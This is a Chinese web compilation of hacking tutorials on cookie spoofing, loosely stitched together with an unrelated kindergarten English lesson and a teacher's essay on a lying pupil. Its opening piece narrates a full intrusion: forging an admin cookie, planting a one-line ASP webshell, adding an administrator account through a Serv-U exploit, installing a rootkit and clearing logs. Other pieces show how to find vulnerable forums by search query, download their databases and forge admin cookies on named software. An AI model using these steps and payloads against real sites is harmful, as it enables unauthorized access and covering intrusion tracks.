Cookies欺骗的艺术(精选10篇)由网友“陈一黑”投稿提供,下面是小编给大家带来关于Cookies欺骗的艺术,一起来看看吧,希望对您有所帮助。
篇1:Cookies欺骗的艺术
DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的)
后台没什么功能,想放弃,可发现了下面的一幕
发现了一个计数器程序的readme
www.abc.com/count/readme.txt
有说明就好办,从网上下了个源程序来
发现漏洞文件count/admin.asp代码如下
_____________________________________________________________
<%
'******************************
'
' 飞越访客单用户统计系统
' 飞越 feiyueziwo@sohu.com
' www.pwsite.net
'
' 版权所有: 动力在线
'
'******************************
%>
<%
response.write Request.Cookies(feiyue)(“Username”)
if Request.Cookies(feiyue)(“Username”)=“” then
response.end
response.Redirect(“login.asp?action=error”)
end if%>
...........
_____________________________________________________________
cookies欺骗一句话就可以搞定
再IE里输入以下代码,再访问www.abc.com/count/admin.asp就是管理员了
javascript.:document.cookie=“feiyue=Username=cooldiyer”;
后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行,
后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到
SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell
主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe
写了一句话木马如下:
<%=Server.CreateObject(“wscript.shell”).exec(request(“cmd”)).stdout.readall%>
执行:
www.abc.com/shell.asp?cmd=D:\www\ftp.exe “net user cooldiyer /add”
www.abc.com/shell.asp?cmd=D:\www\ftp.exe “net localgroup administrators cooldiyer /add”
成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
篇2:什么是Cookies欺骗技术
第一、几个基本概念 Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,
什么是Cookies欺骗技术
,
(呵呵,我自己的定义,高手别见笑) 那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文
篇3:菜鸟教程之cookies欺骗
第一,几个基本概念
cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用
户权限登录,(呵呵,我自己的定义,高手别见笑)
那么什么是cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文
本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字
符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM
中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你
浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用
Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。
第二,原理分析
我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,
看下面:
if login=false then
tl=“ 登 陆 失 败”
mes=mes&“・
src=pic/re.gif align=absmiddle>返回重新填写”
else
Response.Cookies(prefix)(“lgname”)=lgname
session(prefix&“lgname”)=lgname
Response.Cookies(prefix)(“lgpwd”)=lgpwd
Response.Cookies(prefix)(“lgtype”)=lgtype
Response.Cookies(prefix)(“lgcook”)=cook
if cook>0 then
Response.Cookies(prefix).Expires=date+cook
end if
菜鸟你别说晕啊,你要晕我也晕了,我吧这段话的意思打改说一下,就是说如果你登录失败了他
就显示你登录失败并引导你返回上一页,否则就给你写进cookies里面,如果你的cookies有的话
那么你的过期时间就是你cookies的过期时间――也就是你保存cookies的时间了。
到这里,你想到什么了?对,以后登录它只要cookies,那如果我的cookies里面的信息是管理员
的我岂不是成为管理员了?聪明,接着往下看我们怎么做:
第三,cookies欺骗实例
在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码,
怎么拿
呢,follow me %$% 到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆
6kbbs的网站了,他的数据库在 www.***.com/bbs/db/6k.mdb (经过我的测试,我发现用
这个论坛的人至少有60%以上是不改默认数据库路径的,我也不知道为什么),好了,下载
回来没有?我们要开工了。
首先,我们先去注册一个用户,然后登录,看到了吗?有个cookies保存的选项,一定要选哦,
我选择是保存一个月,因为保存了才会再你本机上写进它的cookies。接着,打开数据库,看
admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了,有可能没有,没关
系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺
骗。
打开IECookiesView 晕,你没有啊?快去 www.down99.com/SoftView/SoftView_270.html
下载回来再听,大家等着你呢,快点哦,呵呵%¥……%¥,算了,等它也是白等,我就先介绍
一下IECookiesView吧,这款软件是那来察看和修改本机的cookies的,很方便我们的cookies
欺骗入侵,诶,这么快救下载好了,那我们就继续吧,不废话了(下面小菜:晕,这么多废话了
还说不废话,真想拿香蕉砸他)
在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我
们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己
的。点击“更改cookies”,OK了,打开一个新的IE,然后再去访问那个论坛,看到没有?你现
在已经是管理员了%¥……##¥・,呵呵,
别捣乱哦。
=============
题外话
=============
1,对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是session验证,不是
cookies,所以我们欺骗不了了。
2,这个论坛还有上传漏洞,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不
写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。
3,cookies欺骗大量存在于现在的一些不做session验证的程序中,所以,如果你拿到数据库或
者管理员加密密码,不妨试一下cookies欺骗,会有意想不到的效果哦。
篇4:什么是Cookies和session欺骗?(实例讲解)
cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录,
什么是Cookies和session欺骗?(实例讲解)
,
那么什么是cookies呢,我这里给大家一个专业的解释,cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个coo
篇5:教你熟知Cookies文件的欺骗
第一、几个基本概念
Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,
那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。
第二、原理分析
我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,看下面:
if login=false then tl=“ 登 陆 失 败” mes=mes&“・返回重新填写” else Response.Cookies(prefix)(“lgname”)=lgname session(prefix“lgname”)=lgname Response.Cookies(prefix)(“lgpwd”)=lgpwd Response.Cookies(prefix)(“lgtype”)=lgtype Response.Cookies(prefix)(“lgcook”)=cook if cook>0 then Response.Cookies(prefix).Expires=date+cook end if
我把这段话的意思换个说法,就是说如果你登录失败了他就显示你登录失败并引导你返回上一页,否则就给你写进Cookies里面,如果你的Cookies有的话那么你的过期时间就是你Cookies的过期时间――也就是你保存Cookies的时间了,
到这里,你想到什么了?对,以后登录它只要Cookies,那如果我的Cookies里面的信息是管理员的我岂不是成为管理员了?聪明,接着往下看我们怎么做。
第三、Cookies欺骗实例
在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码。怎么拿呢,到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆6kbbs的网站了,
首先,我们先去注册一个用户,然后登录,看到了吗?有个Cookies保存的选项,一定要选哦。我选择是保存一个月,因为保存了才会再你本机上写进它的Cookies。接着,打开数据库,看Admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了。有可能没有,没关系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺骗。
打开IECookiesView,这款软件是拿来察看和修改本机的Cookies的,很方便我们的Cookies欺骗入侵。
在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己的。点击“更改cookies”,打开一个新的IE,然后再去访问那个论坛,看到没有?你现在已经是管理员了。
题外话
1、对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是Session验证,不是Cookies,所以我们欺骗不了。
2、这个论坛还有上传,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。
3、Cookies欺骗大量存在于现在的一些不做Session验证的程序中,所以,如果你拿到数据库或者管理员加密密码,不妨试一下Cookies欺骗,会有意想不到的效果哦。
篇6:COOKIES
COOKIES_幼儿园小班其他教案
活动目的':
1、使幼儿在吃点心时不知不觉得学会说:“cookies”。
2、让幼儿在学唱歌曲中初步感知学会说“I like…”。
活动准备:
饼干若干个,牛奶每人一杯,围兜一个。
活动过程:
1、以妈妈的身份引起孩子们的兴趣。
T:Tody I am your mum.
T:Oh!my baby I love you.Do you love me?
T:Tody mum make some food for you.
T:Oh!Look what is this?(出示一个遮好布的饼干盆)
T:Now,let’s count.one two three four five.(打开布)
T:Follow me say “cookies”.(分别以三种不同的语调念cookies)
2、发饼干
T:Please,pick up one.you must say thank you.
分发饼干给孩子每人自己拿一块,告诉孩子先不要吃。之后,让孩子边拿着饼干边唱歌,唱完后把饼干吃下去。
T: I like means “我喜欢”.follow me say I like.
第二次让幼儿每人拿2个饼干,唱一个歌曲吃一个。
3、发牛奶
T:好像我们还有东西没有吃。啊,是这个。Say milk(每人发给他们一杯牛奶)
T:I like milk.
T:Please,one mouth milk,one mouth cookie.
T:Oh,it’s yum!
4、结束
T:Clean your mouth after eating.
篇7:XPSHOP商城系统Cookies欺骗漏洞漏洞预警
文章作者:121711090
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...
首先先看看这个站吧:demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704
好..还是用啊D打开网站比较好..看截图:记得要保留cookies
之后便看看他的Cookies...
代码:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1 :
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..
之后就成这样了:
当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
好了..现在再看看会员信息:
是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..
demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..
如下图:
成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..
可是我一直没弄成..理论是只有这样才行..看..
先插马..再备份..但这里出错了..
还望达人能想出更好的办法..
我想了一晚上了....没辙了....
demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录
好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217
demo1.xpshop.cn/helps/t.txt
添加flash广告处可直接上传马
营销管理 - flash广告添加
篇8: 菜鸟教程之熟知Cookies文件的欺骗
第一、几个基本概念
Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,
菜鸟教程之熟知Cookies文件的欺骗
。
那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。
第二、原理分析
我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,看下面:
我把这段话的意思换个说法,就是说如果你登录失败了他就显示你登录失败并引导你返回上一页,否则就给你写进Cookies里面,如果你的Cookies有的话那么你的过期时间就是你Cookies的过期时间――也就是你保存Cookies的时间了,
到这里,你想到什么了?对,以后登录它只要Cookies,那如果我的Cookies里面的信息是管理员的我岂不是成为管理员了?聪明,接着往下看我们怎么做。
第三、Cookies欺骗实例
在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码。怎么拿呢,到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆6kbbs的网站了,
首先,我们先去注册一个用户,然后登录,看到了吗?有个Cookies保存的选项,一定要选哦。我选择是保存一个月,因为保存了才会再你本机上写进它的Cookies。接着,打开数据库,看Admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了。有可能没有,没关系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺骗。
打开IECookiesView,这款软件是拿来察看和修改本机的Cookies的,很方便我们的Cookies欺骗入侵。
在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己的。点击“更改cookies”,打开一个新的IE,然后再去访问那个论坛,看到没有?你现在已经是管理员了。
题外话
1、对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是Session验证,不是Cookies,所以我们欺骗不了。
2、这个论坛还有上传漏洞,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。
3、Cookies欺骗大量存在于现在的一些不做Session验证的程序中,所以,如果你拿到数据库或者管理员加密密码,不妨试一下Cookies欺骗,会有意想不到的效果哦。
篇9:cookies介绍及操作
Cookies 是一小段提请存储在您的计算机硬盘上的文本,当获得您的同意后,浏览器将会把此段文本存储到一个小文件中。
如果您将浏览器设定为在接收 Cookies 之前给予提示,您在访问 okhtm.com 网站时将会注意到希望在您的计算机上放置 Cookies 的请求,其目的是通知我们您何时访问了我们的网站。这个 Cookies 本身只是告诉我们一为过去的访问者再次访问了 okhtm.com 网站,而不会提供有关您的电子邮件地址或您是谁等信息。当然,您可以选择通过注册在以后某个时候告诉我们这些信息。
cookies就是网页放在你的电脑中的一些文件,由网页脚本语言控制生成删除修改访问查阅判断,有一定的时效性(程序中规定)。一般打开是乱码。
怎么察看cookies ?
第一种办法:在 ie里有一个“导入导出功能”,可以将你的 cookies导出到一个自己定义的文件,可以是txt
第二种方法:下载一个叫做 cookies 察看器的小工具,即可以修改删除察看 cookies 文件,
第三中办法:用request.cookies(item)来访问 cookies中的值。
利用cookies进行注入:
在程序中一些程序需要读取客户浏览器中的cookies来进行程序的判断,有的时候程序没有对读取的 cookies进行过滤或者是判断,导致直接把cookies中的一个键的值直接提交到数据库执行。cookies是在我们客户端的,所以随便你怎么改都可以。在网页程序执行的时候直接把cookies中的值没有经过过滤和检查是一种非常危险的事情。
伪造cookies:
在程序的执行中,有的系统是用cookies来读取用户名和密码来进行访问端的身份判断(http是一种无状态协议),在我们通过注入或者是下载数据库读取用户名和密码成功后,可以直接修改cookies,把相应的用户名和密码和权限值代替默认的 cookies中的用户名和密码和权限,意思是当你以一个普通用户登陆的时候,系统给你的电脑生成了一个cookies,其中包括了你的用户名密码权限(普通),当你得知了管理员或者其他用户用户名和密码和权限特征时候可以直接修改cookies,把你的相应的值替换成关键用户的值,这样系统就认为你是真正的那个管理员。
篇10: 欺骗
开学初到现在,三三班的班长一共换过两个人,现在的班长是一个名叫牛蕊的女孩,她善解人意、聪明、可爱、和老师、同学的关系都还不错,而我和刘老师呢,也一直比较看好这个女孩。
然而,近一段时间,她却做出了许多让我“刮目相看”的事――多次欺骗老师。可以说,这件事让我非常生气,因为从这么小的年纪就开始说谎,那长大了该怎么办?之前发生的几件事,在她承认错误之后我都原谅了她,本以为这样的事不会再次发生了,可是我想错了,就在昨晚,这样的事又再次发生了。
昨天晚上是返校日的晚上,照例教师是要开会的,临近开会时间,我再次对牛蕊强调应该注意的事项,就这样离开教室了,我想这样一个聪明机灵的孩子,一定会将我所布置的事安排好,对于她,我还是比较放心的。今天早上一来到教室,我就开始查昨天的做作业情况,一查可不得了,在我们班从未有过的情况出现了:大部分孩子的课堂练习本都没交。问其原因,孩子们都说是牛蕊说不用写的,我就去问牛蕊有没有这回事,她坚决地说没有。后来,我在班级里调查了这件事,最终证实牛蕊确实说了这样的话。后来的后来,她承认了……
其实,早在一开始我就知道她没有说实话,但是我想毕竟是孩子,多给她几次机会让她说实话,可是她都没又说。最后,我决定撤掉班长。
【Cookies欺骗的艺术(精选10篇)】相关文章:
20条英语绕口令带翻译2023-05-19
英语绕口令带解析2023-10-02
带翻译的经典英语绕口令2022-09-02
初中英语绕口令带翻译2023-06-26
鸡肋的反射性xss脚本安全2023-04-01
英语哲理故事演讲2022-05-08
如何提高系统安全――从Cookies开始!2022-10-04
像美国人一样说英语:[11] Bob drives a hard bargain2022-05-06
简单英语绕口令2022-08-03
关于咖啡的英语绕口令2023-08-14